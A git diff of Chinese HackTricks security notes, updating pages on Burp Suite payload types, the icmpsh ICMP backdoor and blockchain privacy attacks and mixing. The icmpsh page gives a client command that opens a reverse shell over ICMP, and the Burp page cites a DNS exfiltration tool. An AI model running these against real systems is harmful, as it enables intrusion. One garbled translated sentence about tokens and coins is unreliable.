[https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake) -- [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) -- [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions) -- [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) -- [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) -- [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse) +* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake) +* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) +* [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions) +* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) +* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) +* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse) diff --git a/burp-suite.md b/burp-suite.md index 83896a89d..eb8f0301b 100644 --- a/burp-suite.md +++ b/burp-suite.md @@ -1,43 +1,45 @@ +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客攻击成为英雄 htARTE (HackTricks AWS Red Team Expert) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在**HackTricks中看到您的公司广告**或**以PDF格式下载HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com) -* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)的github仓库提交PR来**分享您的黑客技巧**。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -# 基础载荷 +# 基本有效载荷 -* **简单列表:** 只包含每行一个条目的列表 -* **运行时文件:** 运行时读取的列表(不加载到内存中)。支持大型列表。 -* **大小写修改:** 对字符串列表应用一些更改(不更改,转为小写,转为大写,转为首字母大写其余小写,转为首字母大写其余保持不变)。 -* **数字:** 使用Z步长或随机生成从X到Y的数字。 -* **暴力破解器:** 字符集,最小和最大长度。 +* **简单列表:** 每行包含一个条目的列表 +* **运行时文件:** 在运行时读取的列表(不加载到内存中)。用于支持大型列表。 +* **大小写修改:** 对字符串列表应用一些更改(无更改,转为小写,转为大写,转为 Proper 名称 - 首字母大写,其余小写 -,转为 Proper 名称 - 首字母大写,其余保持不变 -。 +* **数字:** 使用 Z 步长从 X 到 Y 生成数字或随机生成。 +* **暴力破解器:** 字符集,最小和最大长度。 -[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : 通过DNS请求到burpcollab执行命令并获取输出的载荷。 +[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : 通过 DNS 请求执行命令并获取输出的有效载荷到 burpcollab。 {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客攻击成为英雄 htARTE (HackTricks AWS Red Team Expert) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在**HackTricks中看到您的公司广告**或**以PDF格式下载HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com) -* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)的github仓库提交PR来**分享您的黑客技巧**。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/c2/icmpsh.md b/c2/icmpsh.md index 897df6d21..b7b44997e 100644 --- a/c2/icmpsh.md +++ b/c2/icmpsh.md @@ -1,17 +1,17 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家,使用 htARTE(HackTricks AWS Red Team Expert) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
- +{% endhint %} 从以下链接下载后门:[https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) @@ -35,16 +35,17 @@ read IP ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品,称为[**The PEASS Family**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/crypto-and-stego/blockchain-and-crypto-currencies.md b/crypto-and-stego/blockchain-and-crypto-currencies.md index a62d2204d..56e4c9f8c 100644 --- a/crypto-and-stego/blockchain-and-crypto-currencies.md +++ b/crypto-and-stego/blockchain-and-crypto-currencies.md @@ -1,283 +1,152 @@ +{% hint style="success" %} +学习并练习AWS黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} +## 基本概念 -# 基本术语 +- **智能合约**被定义为在区块链上执行的程序,当满足特定条件时自动执行协议,无需中介。 +- **去中心化应用程序 (dApps)** 建立在智能合约之上,具有用户友好的前端和透明、可审计的后端。 +- **代币和加密货币** 区分为代币作为数字货币,而代币代表特定情境中的价值或所有权。 +- **实用代币** 授予访问服务的权限,而 **安全代币** 表示资产所有权。 +- **DeFi** 代表去中心化金融,提供无需中央机构的金融服务。 +- **DEX** 和 **DAOs** 分别指去中心化交易平台和去中心化自治组织。 -* **智能合约**:智能合约简单地说就是**存储在区块链上的程序**,当满足预定条件时运行。它们通常用于自动化**协议的执行**,以便所有参与者可以立即确定结果,无需任何中介的参与或时间损失。(来源:[这里](https://www.ibm.com/topics/smart-contracts))。 -* 基本上,智能合约是一段**代码**,当人们访问并接受合约时将被执行。智能合约**在区块链上运行**(因此结果被存储为不可变),人们可以在接受之前阅读它们。 -* **dApps**:**去中心化应用程序**是在**智能合约**之上实现的。它们通常具有用户可以与应用程序交互的前端,**后端**是公开的(因此可以进行审计)并且实现为**智能合约**。有时需要使用数据库,以太坊区块链为每个帐户分配一定的存储空间。 -* **代币和硬币**:**硬币**是一种作为**数字货币**的加密货币,而**代币**是代表一些**价值**但不是硬币的东西。 -* **实用性代币**:这些代币允许用户**稍后访问某些服务**(在特定环境中具有某些价值)。 -* **安全性代币**:这些代表**所有权**或某些资产。 -* **DeFi**:**去中心化金融**。 -* **DEX:去中心化交易平台**。 -* **DAOs**:**去中心化自治组织**。 +## 共识机制 -# 共识机制 +共识机制确保在区块链上进行安全且达成一致的交易验证: +- **工作量证明 (PoW)** 依赖计算能力进行交易验证。 +- **权益证明 (PoS)** 要求验证者持有一定数量的代币,相较于 PoW 减少能源消耗。 -要使区块链交易得到承认,必须将其**附加**到**区块链**上。验证者(矿工)执行此附加操作;在大多数协议中,他们**为此获得奖励**。为了保持区块链的安全性,必须有一种机制来**防止恶意用户或组织接管大多数验证**。 +## 比特币基础知识 -工作量证明,另一种常用的共识机制,使用计算能力的验证来验证交易,要求潜在攻击者获取验证者网络大部分计算能力的大部分。 +### 交易 -## 工作量证明(PoW) +比特币交易涉及在地址之间转移资金。交易通过数字签名验证,确保只有私钥的所有者可以发起转账。 -这使用**计算能力验证**来验证交易,要求潜在攻击者获取验证者网络大部分计算能力的大部分。\ -**矿工**将**选择几笔交易**,然后开始**计算工作量证明**。**具有最大计算资源的矿工**更有可能**更早完成**工作量证明并获得所有交易的费用。 +#### 关键组件: -## 权益证明(PoS) +- **多重签名交易** 需要多个签名来授权交易。 +- 交易包括 **输入** (资金来源)、**输出** (目的地)、**费用** (支付给矿工) 和 **脚本** (交易规则)。 -PoS通过**要求验证者拥有一定数量的区块链代币**来实现这一点,要求**潜在攻击者获取区块链上大部分代币**以发动攻击。\ -在这种共识机制中,矿工拥有的代币越多,矿工被要求创建下一个区块的可能性就越大。\ -与PoW相比,这大大**减少了矿工消耗的能量**。 +### 闪电网络 -# 比特币 +旨在通过允许通道内的多个交易,仅向区块链广播最终状态来增强比特币的可扩展性。 -## 交易 +## 比特币隐私问题 -简单的**交易**是从一个地址向另一个地址的**资金转移**。\ -在比特币中,一个**地址**是**公钥**的哈希值,因此,为了从地址进行交易,某人需要知道与该公钥(地址)关联的私钥。\ -然后,当执行**交易**时,它会使用地址的私钥进行**签名**,以显示交易的**合法性**。 - -在比特币中生成数字签名的第一部分可以用以下数学方式表示:\ -_**Sig**_ = _**Fsig**_(_**Fhash**_(_**m**_),_**dA**_) - -其中: - -* \_d\_A是签名**私钥** -* _m_是**交易** -* Fhash是哈希函数 -* Fsig是签名算法 -* Sig是生成的签名 - -签名函数(Fsig)生成一个包含两个值R和S的签名: - -* Sig = (R, S) - -一旦计算出R和S,它们将被序列化为一个字节流,然后使用称为Distinguished Encoding Rules(DER)的国际标准编码方案进行编码。为了验证签名的有效性,将使用签名验证算法。验证数字签名需要以下内容: - -* 签名(R和S) -* 交易哈希 -* 与用于创建交易签名的私钥对应的公钥 - -签名验证算法有效地意味着只有私钥的所有者(生成公钥的私钥)才能在交易上生成签名。如果签名有效,则签名验证算法将返回“TRUE”。 - -### 多重签名交易 - -多重签名**地址**是与多个ECDSA私钥关联的地址。最简单的类型是m-of-n地址 - 它与n个私钥关联,并且从该地址发送比特币需要至少m个密钥的签名。多重签名**交易**是从多重签名地址发送资金的交易。 - -### 交易字段 - -每个比特币交易都有几个字段: - -* **输入**:**比特币**从哪个地址**转移** -* **输出**:转移到**每个**输出的地址和金额 -* **费用**:支付给交易矿工的金额 -* **Script\_sig**:交易的脚本签名 -* **Script\_type**:交易类型 - -有**2种主要类型**的交易: - -* **P2PKH:“支付到公钥哈希”**:这是交易的执行方式。您要求**发送方**提供有效的**签名**(来自私钥)和**公钥**。交易输出脚本将使用签名和公钥,并通过一些加密函数检查**是否与公钥哈希匹配**,如果匹配,则**资金**将是**可支配的**。这种方法将公钥以哈希形式隐藏,以提供额外的安全性。 -* **P2SH:“支付到脚本哈希”**:交易的输出只是**脚本**(这意味着想要这笔钱的人发送一个脚本),如果**使用特定参数执行将导致布尔值为`true`或`false`**。如果矿工使用提供的参数运行输出脚本并结果为`true`,则**资金将发送到您想要的输出**。`P2SH`用于**多重签名**钱包,使输出脚本成为**在接受交易之前检查多个签名的逻辑**。`P2SH`也可用于允许任何人或没有人花费资金。如果P2SH交易的输出脚本只是`1`表示为true,则尝试在不提供参数的情况下花费输出将导致`1`,使尝试花费资金的任何人都可以花费。这也适用于返回`0`的脚本,使输出对任何人都不可花费。 - -## 闪电网络 - -该协议有助于**向通道执行多个交易**,并**仅**将**最终状态**发送到区块链以保存。\ -这**提高了**比特币区块链的**速度**(每秒仅允许7笔支付),并允许创建**更难追踪的交易**,因为通道是通过比特币区块链的节点创建的: - -![](<../../.gitbook/assets/image (611).png>) - -闪电网络的正常使用包括通过向相关基础区块链(第1层)承诺资金交易来**打开支付通道**,然后进行**任意数量**的闪电网络**交易**,更新通道资金的暂定分配**而无需将其广播到区块链**,最后通过**广播**解决交易的**最终版本**来关闭支付通道以分配通道资金。 - -请注意,通道的任一成员都可以随时停止并将通道的最终状态发送到区块链。 - -# 比特币隐私攻击 - -## 共同输入 - -理论上,一笔交易的输入可以属于不同的用户,但实际上这是不常见的,因为这需要额外的步骤。因此,很多时候可以假定**同一笔交易中的2个输入地址属于同一所有者**。 - -## UTXO找零地址检测 - -**UTXO**表示**未花费的交易输出**(UTXOs)。在使用来自先前交易的输出作为输入的交易中,**整个输出需要被花费**(以避免双重花费攻击)。因此,如果意图是仅**发送**该输出的一部分资金到一个地址并**保留**另一部分资金,将会出现**2个不同的输出**:预期的输出和一个**随机新的找零地址**,剩余资金将保存在其中。 - -然后,观察者可以假设**生成的新找零地址属于UTXO的所有者**。 - -## 社交网络和论坛 - -一些人在互联网上的不同网站上提供有关他们比特币地址的数据。**这使得很容易识别地址的所有者**。 - -## 交易图 - -通过以图形方式表示交易,**有可能以一定概率知道账户资金的去向**。因此,可以了解与**区块链中相关的用户**的一些信息。 - -## **不必要的输入启发式** - -也称为“最佳找零启发式”。考虑这笔比特币交易。它有两个价值分别为2 BTC和3 BTC的输入以及价值为4 BTC和1 BTC的两个输出。 -``` -2 btc --> 4 btc -3 btc 1 btc -``` -假设其中一个输出是找零,另一个输出是支付。有两种解释:支付输出要么是4 BTC输出,要么是1 BTC输出。但如果1 BTC输出是支付金额,那么3 BTC输入就是不必要的,因为钱包本可以只花费2 BTC输入并支付更低的矿工费用。这表明真正的支付输出是4 BTC,而1 BTC是找零输出。 - -这对于具有多个输入的交易是一个问题。修复此泄漏的一种方法是添加更多输入,直到找零输出高于任何输入,例如: -``` -2 btc --> 4 btc -3 btc 6 btc -5 btc -``` -## 强制地址重用 - -**强制地址重用**或**激励地址重用**是指对已在区块链上使用过的地址支付(通常是小额)比特币的对手。对手希望用户或其钱包软件**将这些支付用作更大交易的输入,从而通过共同输入所有权**启发式揭示其他地址。这些支付可以被理解为一种迫使地址所有者无意中重用地址的方式。 - -这种攻击有时被错误地称为**尘埃攻击**。 - -钱包的正确行为是不要花费已经落入已使用空地址的硬币。 - -## 其他区块链分析 - -* **确切的支付金额**:为了避免带有找零的交易,支付需要等于UTXO(这是非常不寻常的)。因此,**没有找零地址的交易可能是同一用户之间的转账**。 -* **整数金额**:在交易中,如果输出之一是“**整数金额**”,那么很可能这是**支付给将该“整数金额”作为价格的人**,因此另一部分必须是剩余部分。 -* **钱包指纹识别**:仔细的分析师有时可以推断出哪个软件创建了某个交易,因为**许多不同的钱包软件并不总是以完全相同的方式创建交易**。钱包指纹识别可用于检测找零输出,因为找零输出是使用相同钱包指纹花费的输出。 -* **金额和时间相关性**:如果执行交易的人**披露**了交易的**时间**和/或**金额**,那么这很容易**被发现**。 - -## 流量分析 - -一些组织**窃听您的流量**可能会看到您在比特币网络中通信。\ -如果对手看到一个交易或区块**从您的节点发出而之前没有进入**,那么几乎可以确定**该交易是由您进行的或该区块是由您挖掘的**。由于涉及互联网连接,对手将能够**将IP地址与发现的比特币信息联系起来**。 - -无法窃听所有互联网流量但拥有**大量比特币节点**以便**更接近**源的攻击者可能能够知道宣布交易或区块的IP地址。\ -此外,一些钱包定期重新广播其未确认的交易,以便更有可能通过网络广泛传播并被挖掘。 - -## 其他攻击以查找地址所有者信息 - -有关更多攻击,请阅读[https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy) - -# 匿名比特币 +隐私攻击,如 **共同输入所有权** 和 **UTXO 更改地址检测**,利用交易模式。像 **混币** 和 **CoinJoin** 这样的策略通过模糊用户之间的交易链接来提高匿名性。 ## 匿名获取比特币 -* **现金交易**:使用现金购买比特币。 -* **现金替代品**:购买礼品卡或类似物品,并在线交换它们为比特币。 -* **挖矿**:挖矿是获取比特币最匿名的方式。这适用于独立挖矿,因为[挖矿池](https://en.bitcoin.it/wiki/Pooled\_mining)通常知道哈希者的IP地址。 -* **盗窃**:理论上,另一种获取匿名比特币的方式是窃取它们。 +方法包括现金交易、挖矿和使用混币。**CoinJoin** 将多个交易混合在一起以增加追踪难度,而 **PayJoin** 将 CoinJoin 伪装成常规交易以提高隐私性。 +```bash +2 btc --> 4 btc +3 btc 1 btc +``` +## **强制地址重用** + +攻击者可能向先前使用过的地址发送小额金额,希望接收方将这些金额与将来的其他输入合并在一起进行交易,从而将地址关联起来。 + +### 正确的钱包行为 +钱包应避免使用已经使用过的空地址收到的硬币,以防止这种隐私泄漏。 + +## **其他区块链分析技术** + +- **确切的支付金额:** 没有找零的交易很可能是同一用户拥有的两个地址之间的交易。 +- **整数金额:** 交易中的整数金额表明这是一笔付款,而非整数输出很可能是找零。 +- **钱包指纹识别:** 不同的钱包具有独特的交易创建模式,允许分析人员识别所使用的软件,可能还有找零地址。 +- **金额和时间相关性:** 披露交易时间或金额可能使交易可追踪。 + +## **流量分析** + +通过监视网络流量,攻击者可能将交易或区块与 IP 地址关联起来,危及用户隐私。如果一个实体运行许多比特币节点,尤其是真实,这一点尤为真实,增强了他们监视交易的能力。 + +## 更多 +有关隐私攻击和防御的全面列表,请访问[比特币维基上的比特币隐私](https://en.bitcoin.it/wiki/Privacy)。 + +# 匿名比特币交易 + +## 匿名获取比特币的方法 + +- **现金交易:** 通过现金获取比特币。 +- **现金替代品:** 购买礼品卡并在线兑换比特币。 +- **挖矿:** 通过挖矿赚取比特币是最私密的方法,尤其是在独自进行挖矿时,因为挖矿池可能知道矿工的 IP 地址。[挖矿池信息](https://en.bitcoin.it/wiki/Pooled_mining) +- **盗窃:** 理论上,窃取比特币可能是另一种匿名获取比特币的方法,尽管这是非法的,不建议这样做。 ## 混币服务 -用户会**将比特币发送到混币服务**,服务会**发送不同的比特币回给用户**,扣除一定费用。理论上,观察区块链的对手将**无法将**进入和离开的交易**联系起来**。 - -然而,用户需要信任混币服务将比特币退还,并且不会保存有关接收和发送资金之间关系的日志。\ -还可以使用其他服务作为混币服务,例如比特币赌场,您可以在那里发送比特币,稍后取回。 +通过使用混币服务,用户可以**发送比特币**并收到**不同的比特币作为回报**,这使得追踪原始所有者变得困难。然而,这需要对服务的信任,不要保留日志并确实归还比特币。替代混币选项包括比特币赌场。 ## CoinJoin -**CoinJoin**将**不同用户的多个交易混合成一个**,以使观察者更难找出**哪个输入与哪个输出相关**。\ -这提供了新的隐私级别,但是,**某些** **交易**,其中某些输入和输出金额相关或与其他输入和输出非常不同**仍然可以被外部观察者关联**。 +**CoinJoin**将来自不同用户的多个交易合并为一笔交易,使试图将输入与输出匹配的人的过程变得复杂。尽管其有效性,具有独特输入和输出大小的交易仍可能被追踪。 -比特币区块链上可能的CoinJoin交易ID示例为`402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a`和`85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`。 +可能使用了CoinJoin的示例交易包括`402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a`和`85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`。 -[**https://coinjoin.io/en**](https://coinjoin.io/en)\ -**类似于CoinJoin但更好,对于以太坊,您可以使用** [**Tornado Cash**](https://tornado.cash) **(资金来自矿工,因此它只会出现在您的钱包中)。** +有关更多信息,请访问[CoinJoin](https://coinjoin.io/en)。对于以太坊上类似的服务,请查看[Tornado Cash](https://tornado.cash),该服务使用矿工资金匿名化交易。 ## PayJoin -在前一节讨论的CoinJoin类型可以通过检查具有相同价值的多个输出来轻松识别。 - -PayJoin(也称为支付到终点或P2EP)是两方之间的一种特殊类型的CoinJoin,其中一方支付另一方。然后,交易**没有具有相同价值的多个输出**,因此不会明显显示为具有相同输出的CoinJoin。考虑这个交易: -``` +作为CoinJoin的变体,**PayJoin**(或P2EP)将交易伪装成两个当事人(例如,客户和商家)之间的常规交易,而不具有CoinJoin特有的等额输出特征。这使得它极其难以检测,并且可能使交易监视实体使用的共同输入所有权启发式失效。 +```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` -# 比特币隐私良好实践 +## **加密货币中的隐私最佳实践** -## 钱包同步 +### **钱包同步技术** -比特币钱包必须以某种方式获取有关其余额和历史记录的信息。截至2018年底,最实用和私密的现有解决方案是使用**完整节点钱包**(最大程度上保护隐私)和**客户端端区块过滤**(非常好)。 +为了维护隐私和安全,与区块链同步钱包至关重要。有两种突出的方法: -- **完整节点:** 完整节点下载包含比特币上发生的每笔[交易](https://en.bitcoin.it/wiki/Transaction)的整个区块链。因此,监视用户的互联网连接的对手将无法了解用户感兴趣的交易或地址。 -- **客户端端区块过滤:** 客户端端区块过滤通过创建包含每个区块中每笔交易的所有地址的**过滤器**来工作。这些过滤器可以测试一个**元素是否在集合中**;虽然可能存在误报,但不存在漏报。轻量级钱包会**下载**区块链中每个**区块**的所有过滤器,并检查其**自己的地址**是否匹配。包含匹配项的区块将从点对点网络中完整下载,并且这些区块将用于获取钱包的历史记录和当前余额。 +- **完整节点**:通过下载整个区块链,完整节点确保最大隐私性。所有历史交易都存储在本地,使对手无法识别用户感兴趣的交易或地址。 +- **客户端端区块过滤**:该方法涉及为区块链中的每个区块创建过滤器,允许钱包识别相关交易而不向网络观察者公开特定兴趣。轻量级钱包下载这些过滤器,仅在找到与用户地址匹配的完整区块时才获取完整区块。 -## Tor +### **利用 Tor 实现匿名性** -比特币网络使用点对点网络,这意味着其他节点可以了解您的IP地址。因此,建议您**每次与比特币网络交互时都通过Tor连接**。 +鉴于比特币在点对点网络上运行,建议使用 Tor 来掩盖您的 IP 地址,在与网络交互时增强隐私。 -## 避免地址重复使用 +### **防止地址重复使用** -**地址被多次使用对隐私非常有害,因为它将更多的区块链交易链接在一起,并证明它们是由同一实体创建的**。使用比特币的最私密和安全的方式是向每个付款人发送一个全新的地址。收到的硬币花费后,该地址不应再次使用。此外,在发送比特币时应要求一个全新的比特币地址。所有良好的比特币钱包都有一个用户界面,以防止地址重复使用。 +为了保护隐私,每次交易都使用新地址至关重要。重复使用地址可能通过将交易与同一实体关联来损害隐私。现代钱包通过设计阻止地址重复使用。 -## 多笔交易 +### **交易隐私策略** -用**多笔链上交易**支付某人可以大大降低基于金额的隐私攻击的威力,例如金额相关性和整数金额。例如,如果用户想向某人支付5 BTC,并且不希望5 BTC的价值很容易被搜索到,那么他们可以发送两笔价值分别为2 BTC和3 BTC的交易,总共为5 BTC。 +- **多笔交易**:将支付拆分为多笔交易可以模糊交易金额,阻止隐私攻击。 +- **避免找零**:选择不需要找零输出的交易可通过破坏找零检测方法来增强隐私。 +- **多个找零输出**:如果避免找零不可行,生成多个找零输出仍可提高隐私性。 -## 避免找零 +# **门罗币:匿名的灯塔** -避免找零是指仔细选择交易输入和输出,以完全不需要找零输出。**没有找零输出对隐私非常有利**,因为它破坏了找零检测启发式。 +门罗币满足了数字交易中绝对匿名的需求,为隐私设定了高标准。 -## 多个找零输出 +# **以太坊:Gas 和交易** -如果避免找零不可行,则**创建多个找零输出可以提高隐私**。这也会破坏通常假定只有一个找零输出的找零检测启发式。由于此方法使用的区块空间比通常多,因此避免找零更可取。 +### **理解 Gas** -# 门罗币 +Gas 衡量在以太坊上执行操作所需的计算工作量,以 **gwei** 定价。例如,一笔花费 2,310,000 gwei(或 0.00231 ETH)的交易涉及 gas 限制、基本费用和激励矿工的小费。用户可以设置最大费用以确保不过度支付,多余部分将退还。 -当门罗币开发时,它试图解决的迫切需求是**完全匿名**,在很大程度上,它填补了这一空白。 +### **执行交易** -# 以太坊 +以太坊中的交易涉及发送方和接收方,可以是用户或智能合约地址。它们需要支付费用并且必须被挖掘。交易中的基本信息包括接收方、发送方签名、价值、可选数据、gas 限制和费用。值得注意的是,发送方地址是从签名中推断出来的,因此在交易数据中不需要它。 -## Gas - -Gas指的是衡量以太坊网络上执行特定操作所需的**计算工作量**的单位。Gas是成功进行以太坊**交易**所需的**费用**。 - -Gas价格以**gwei**表示,gwei本身是ETH的一个单位 - 每个gwei等于**0.000000001 ETH**(10的-9次方ETH)。例如,您可以说您的gas费用为1 